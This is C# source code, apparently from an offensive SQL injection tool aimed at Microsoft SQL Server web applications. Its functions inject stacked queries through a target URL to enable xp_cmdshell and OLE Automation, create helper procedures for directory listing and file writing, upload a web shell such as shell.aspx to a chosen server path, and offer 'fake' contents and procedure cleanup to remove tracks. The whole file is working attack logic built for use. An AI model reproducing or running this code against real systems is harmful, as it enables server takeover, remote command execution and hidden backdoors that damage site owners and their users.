public static bool enableXPCMDShell(string url) { string XPCMDShellEnablingQuery = QueryCrafter.constructStackedQuery(url, QueriesDB.EnableXPCMDShell); XPCMDShellEnablingQuery = XPCMDShellEnablingQuery.Replace("'rummykhan'", QueriesDB.Replacement); if (ResponseFilter.confirmResponce(XPCMDShellEnablingQuery, QueriesDB.Replacement)) { Log.logOutput("XP CMD Shell Enabled.."); return(true); } Log.logError("Failed to Enable XP CMD Shell.."); return(false); }
public static bool enableOLEAutomation(string url) { string OLEAutomationEnablingQuery = QueryCrafter.constructStackedQuery(url, QueriesDB.EnableOLEAutomation); OLEAutomationEnablingQuery = OLEAutomationEnablingQuery.Replace("'rummykhan'", QueriesDB.Replacement); if (ResponseFilter.confirmResponce(OLEAutomationEnablingQuery, QueriesDB.Replacement)) { Log.logOutput("OLE Automation Enabled.."); return(true); } Log.logError("Failed to Enable OLE Automation Procedures.."); return(false); }
static bool createProcFcUk(string url) { try { var FcUkProcCreationURL = QueryCrafter.constructStackedQuery(url, QueriesDB.UploadFileProcQuery); FcUkProcCreationURL = QueryCrafter.constructURLForConfirmation(FcUkProcCreationURL, QueriesDB.Replacement); if (ResponseFilter.confirmResponce(FcUkProcCreationURL, QueriesDB.Replacement)) { var FcUkProcConfirmationURL = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ConfirmFcUkProcQuery); var response = HTTPMethods.getResponse(FcUkProcConfirmationURL); if (response != null) { if (ResponseFilter.getPureResponseWithLastIndex(response) == "FcUk") { Log.logOutput("Procedure to Upload Shell is created.."); return(true); } else { Log.logError("1 Procedure to Upload Shell cannot be created.."); return(false); } } else { Log.logError("2 Procedure to Upload Shell cannot be created.."); return(false); } } else { Log.logError("Erroneous response from the server.."); Log.logError("Procedure to Upload Shell cannot be created.."); return(false); } } catch (Exception ex) { Log.logError(ex.Message); return(false); } }
static bool createFuncDir(string url) { try { var DIRFuncCreationURL = QueryCrafter.constructStackedQuery(url, QueriesDB.DirListingFuncQuery); DIRFuncCreationURL = QueryCrafter.constructURLForConfirmation(DIRFuncCreationURL, QueriesDB.Replacement); if (ResponseFilter.confirmResponce(DIRFuncCreationURL, QueriesDB.Replacement)) { var DIRFuncConfirmationURL = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ConfirmDirFuncQuery); var response = HTTPMethods.getResponse(DIRFuncConfirmationURL); if (response != null) { if (ResponseFilter.getPureResponseWithLastIndex(response) == "Dir") { Log.logOutput("Function to get Directory Listing is created.."); return(true); } else { Log.logError("Function to get Directory Listing cannot be created.."); return(false); } } else { Log.logError("Function to get Directory Listing cannot be created.."); return(false); } } else { Log.logError("Erroneous response from the server.."); Log.logError("Function to get Directory Listing cannot be created.."); return(false); } } catch (Exception ex) { Log.logError(ex.Message); return(false); } }
public static void Spawn(string url) { Log.logNotification("Confirming Web Response.."); var urlForResponseConfirmation = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement); if (ResponseFilter.confirmResponce(urlForResponseConfirmation, QueriesDB.Replacement)) { Log.logNotification("Web Response is OK.."); if (createProcFcUk(url)) { string RootPath = "z"; while (RootPath != "x") { RootPath = UserInteraction.takeInputString("Press x for Exit..\nEnter root for folder path C:\\websites\\somedir\\ "); if (RootPath != "x") { string fileName = UserInteraction.takeInputString("Enter filename to upload eg. shell.aspx .."); string UrlForUploading = null; string x = UserInteraction.takeInputString("Press 'r' for using Real Shell Contents..\nPress 'f' for fake Shell Contens to remove tracks.."); if (x == "f") { UrlForUploading = QueryCrafter.constructStackedQuery(url, QueriesDB.FileUploadingQueryFAKE); } else { UrlForUploading = QueryCrafter.constructStackedQuery(url, QueriesDB.FileUploadingQueryREAL); } UrlForUploading = UrlForUploading.Replace("[PATH]", RootPath); UrlForUploading = UrlForUploading.Replace("[FILENAME]", fileName); UrlForUploading = UrlForUploading.Replace("rummykhan", QueriesDB.Replacement); Log.logNotification("Uploading shell to " + RootPath + fileName); if (ResponseFilter.confirmResponce(UrlForUploading, QueriesDB.Replacement)) { Log.logNotification("Confirming File Upload.."); if (confirmFileUpload(url, RootPath + fileName)) { Log.logOutput("Shell uploaded successfully to : " + RootPath + fileName); } else { Log.logError("Fail to upload file.."); } } } } } dropObject(url, QueriesDB.DropFcUkProcQuery); } else { Log.logError("No response from the server.."); } }